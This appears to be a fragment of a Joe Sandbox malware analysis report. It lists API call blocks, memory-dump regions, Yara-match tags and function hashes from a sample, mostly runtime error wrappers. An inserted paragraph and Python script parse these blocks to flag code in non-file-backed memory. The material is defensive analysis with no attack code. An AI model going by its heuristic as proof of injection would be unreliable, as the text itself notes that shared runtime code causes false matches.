                                                                                                                                                                                                                                                                          • __Cnd_signal.LIBCPMT ref: 02495A8F
                                                                                                                                                                                                                                                                          • std::_Cnd_initX.LIBCPMT ref: 02495AA4
                                                                                                                                                                                                                                                                          • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02495AAB
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2059591211-0
                                                                                                                                                                                                                                                                          • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                          • Instruction ID: 1d291883ecb988132d4ad8f1209f9f805ce79026a3dbe43b70d27fdf92383c51
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75F0A031400701AFEF31BB73D80671A7BA2AF00328F14481FE05A969A0CFBAE8588E55
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 024A286F
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,024A8830,?,?,?,?,00000000,?,00000000), ref: 024A287E
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A2894
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024A28A2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
• String ID:
• API String ID: 3803302727-0
• Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
• Instruction ID: 5b178edeeb9e694e79348fd3ea74aa3d72978b0baca00257bc04dd5c53f34f05
• Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
• Instruction Fuzzy Hash: 43F0A07450010ABBCF00EFE5CD44EAF37B86B00701F20061AB914E20A0DB74D604AB64

APIs
• ___crtCreateEventExW.LIBCPMT ref: 0041232C
• GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
• __CxxThrowException@8.LIBVCRUNTIME ref: 0041235E
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
• String ID:
• API String ID: 200240550-0
• Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
• Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
• Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
• Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC

APIs
• ___crtCreateEventExW.LIBCPMT ref: 024A2593
• GetLastError.KERNEL32(?,?,?,?,?,024A0DA0), ref: 024A25A1
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A25B7
• __CxxThrowException@8.LIBVCRUNTIME ref: 024A25C5
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
• String ID:
• API String ID: 200240550-0
• Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
• Instruction ID: 3a96b71ea9408bb28c296cf4102a922ad59a4c9c7cf212227c5e00dea17457b8
• Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
• Instruction Fuzzy Hash: 91E0D861A002153AEB10F7768C26F7F369C9B20B41F84085BBD14E11C1FAD4D10059B4

APIs
  • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
• TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
• GetLastError.KERNEL32 ref: 00423991
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
• __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
• String ID:
• API String ID: 3735082963-0
• Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
• Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
• Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
• Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D

APIs
  • Part of subcall function 024A2959: TlsAlloc.KERNEL32(?,024A0DA0), ref: 024A295F
• TlsAlloc.KERNEL32(?,024A0DA0), ref: 024B3BE6
• GetLastError.KERNEL32 ref: 024B3BF8
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B3C0E
• __CxxThrowException@8.LIBVCRUNTIME ref: 024B3C1C
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
• String ID:
• API String ID: 3735082963-0
• Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
• Instruction ID: b3c97a95c1233cc29df054eb62f286d4cf722dc31770e959dbb7d71aa340c71b
• Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
• Instruction Fuzzy Hash: EFE061745042016FC700FF775C556BF3A686E007017100E7BE529D2191EB34D0454F7C

APIs
• GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
• __CxxThrowException@8.LIBVCRUNTIME ref: 0041256A
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
• String ID:
• API String ID: 3016159387-0
• Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
• Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
• Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
• Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C

APIs
• GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024A0DA0), ref: 024A279E
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024A0DA0), ref: 024A27AD
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A27C3
• __CxxThrowException@8.LIBVCRUNTIME ref: 024A27D1
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
• String ID:
• API String ID: 3016159387-0
                                                                                                                                                                                                                                                                          • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                          • Instruction ID: 86d11cf1b1ea1a6c194e31be25a5354771eedb02b7757a04601ed483c977df47
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADE0867C60010AA7CB00FBB6DD49EAF73BC6E10B05B600566A905E3150EBA8D7089B79
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041269D
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4286982218-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                          • Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00412787
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1964976909-0
                                                                                                                                                                                                                                                                          • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                          • Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetThreadPriority.KERNEL32(?,?), ref: 024A28F8
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 024A2904
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A291A
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024A2928
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4286982218-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                          • Instruction ID: df36c4138965ba6795728a2015c1251380815ce3c20f7dd82acac46429a2ea21
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FE0863460010967DB14FF72CC05BBB376C7F10B45B500926BD19D20A0EB75D1049AA8
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • TlsSetValue.KERNEL32(?,00000000,024A7BD8,00000000,?,?,024A0DA0,?,?,?,00000000,?,00000000), ref: 024A29BE
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 024A29CA
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A29E0
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024A29EE
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1964976909-0
                                                                                                                                                                                                                                                                          • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                          • Instruction ID: ea74fe14828d9e44e23c0c8f59f6b3d5d4302b0e7e13ed2f12297a5d37604dbd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50E086742001096BDB10FF71CC08BBF376C7F10B45B500926BD19D10A0EB75D114AAA8
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00412705
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3103352999-0
                                                                                                                                                                                                                                                                          • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                          • Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C
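The blocks above list the same function twice: Opcode ID 2e8a5abc… (the SetThreadPriority wrapper) appears under the PE-backed image at offset 00400000 and again under the region at offset 02490000, which the report marks "based on PE: false" and tags with Yara matches, while the Instruction IDs of the two copies differ. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses blocks in this format and surfaces exactly that pattern, a region with no PE file behind it that contains a function also present in the loaded image. The sample input is copied from the blocks on this page, abridged to the lines the parser reads. Treating Opcode ID as an operand-independent hash and Instruction ID as one that includes operands is an inference from the fact that only the latter changes between the two copies here; the report does not state it.

```python
"""Cross-reference Joe Sandbox function blocks across dumped memory regions.
Added example (not the report's or Joe Sandbox's code): parses the
"APIs / Memory Dump Source / Similarity" blocks as printed in the report
and finds functions (by Opcode ID) listed under more than one region.
"""
import re
from dataclasses import dataclass

# Constructed sample: three blocks copied from this report, abridged to the
# lines the parser reads. Opcode ID 2e8a... is listed under both regions.
SAMPLE = """\
APIs
• SetThreadPriority.KERNEL32(?,?), ref: 00412691
• GetLastError.KERNEL32 ref: 0041269D
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
• __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
• Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
APIs
• SetThreadPriority.KERNEL32(?,?), ref: 024A28F8
• GetLastError.KERNEL32 ref: 024A2904
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A291A
• __CxxThrowException@8.LIBVCRUNTIME ref: 024A2928
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Yara matches
• Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
• Instruction ID: df36c4138965ba6795728a2015c1251380815ce3c20f7dd82acac46429a2ea21
APIs
• TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
• GetLastError.KERNEL32 ref: 00412705
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
• __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
• Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
"""

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR"
API_RE = re.compile(
    r"^• (?P<call>\S+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$", re.M)
SOURCE_RE = re.compile(r"Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), "
                       r"based on PE: (?P<pe>true|false)")
OPCODE_RE = re.compile(r"^• Opcode ID: ([0-9a-f]+)$", re.M)
INSN_RE = re.compile(r"^• Instruction ID: ([0-9a-f]+)$", re.M)


@dataclass
class ApiCall:
    call: str     # "SetThreadPriority"
    module: str   # "KERNEL32"
    args: tuple   # argument column as printed; "?" means unresolved
    ref: int      # call-site address


@dataclass
class FunctionBlock:
    offset: str          # region base as printed, e.g. "00400000"
    based_on_pe: bool    # False: the region is not mapped from a PE file
    yara_match: bool     # the block carried a "Yara matches" section
    opcode_id: str       # inferred: hash over opcodes only (equal across both copies here)
    instruction_id: str  # inferred: hash over full instructions (differs between copies)
    apis: list


def parse_blocks(text):
    """One FunctionBlock per 'APIs' section; blocks missing a source or IDs are skipped."""
    blocks = []
    for chunk in re.split(r"^APIs$", text, flags=re.M)[1:]:
        src, op, insn = SOURCE_RE.search(chunk), OPCODE_RE.search(chunk), INSN_RE.search(chunk)
        if not (src and op and insn):
            continue
        apis = [ApiCall(m["call"], m["module"],
                        tuple(m["args"].split(",")) if m["args"] else (), int(m["ref"], 16))
                for m in API_RE.finditer(chunk)]
        blocks.append(FunctionBlock(src["offset"], src["pe"] == "true",
                                    bool(re.search(r"^Yara matches$", chunk, re.M)),
                                    op[1], insn[1], apis))
    return blocks


def shared_opcodes(blocks):
    """Opcode ID -> sorted region offsets, for functions listed under more than one region."""
    seen = {}
    for b in blocks:
        seen.setdefault(b.opcode_id, set()).add(b.offset)
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}


def non_pe_regions_sharing_code(blocks):
    """Regions not backed by a PE image that hold a function also present in a PE-backed
    region: offset -> {"yara", "functions", "relocated"}. "relocated" is True when the
    Instruction ID differs from the PE-backed copy (same opcodes, different operands)."""
    shared = shared_opcodes(blocks)
    pe_insn = {b.opcode_id: b.instruction_id for b in blocks if b.based_on_pe}
    out = {}
    for b in blocks:
        if b.based_on_pe or b.opcode_id not in shared or b.opcode_id not in pe_insn:
            continue
        e = out.setdefault(b.offset, {"yara": False, "functions": set(), "relocated": False})
        e["yara"] = e["yara"] or b.yara_match
        e["functions"].add(b.apis[0].call if b.apis else None)
        e["relocated"] = e["relocated"] or pe_insn[b.opcode_id] != b.instruction_id
    return out
```

Run `non_pe_regions_sharing_code(parse_blocks(SAMPLE))` and the only hit is region 02490000, with a Yara match and a relocated copy of the SetThreadPriority wrapper. One caveat before reading too much into it: every function in these blocks is the same statically linked Concurrency Runtime pattern (Win32 call, GetLastError, construct scheduler_resource_allocation_error, __CxxThrowException), so a shared Opcode ID shows that the runtime was carried along into a region no file backs, not that the runtime code is itself malicious, and an opcode-only hash of such a wrapper will also match any other binary built against the same runtime.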
APIs
• TlsAlloc.KERNEL32(?,024A0DA0), ref: 024A295F
• GetLastError.KERNEL32 ref: 024A296C
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A2982
• __CxxThrowException@8.LIBVCRUNTIME ref: 024A2990
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3103352999-0
                                                                                                                                                                                                                                                                          • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                          • Instruction ID: b69a824207fba3da389de3e87c5744bc4b3fc70d9c3239280e3e36a703973d80
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37E02B7410010567C714FBB99C4CBBF32AC7F11B15B600F2BF865E20E0EBA8D1085AAC
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 0042F10D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                          • String ID: pow
                                                                                                                                                                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                          • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                                                          • Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                                                          • API String ID: 0-711371036
                                                                                                                                                                                                                                                                          • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                          • Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
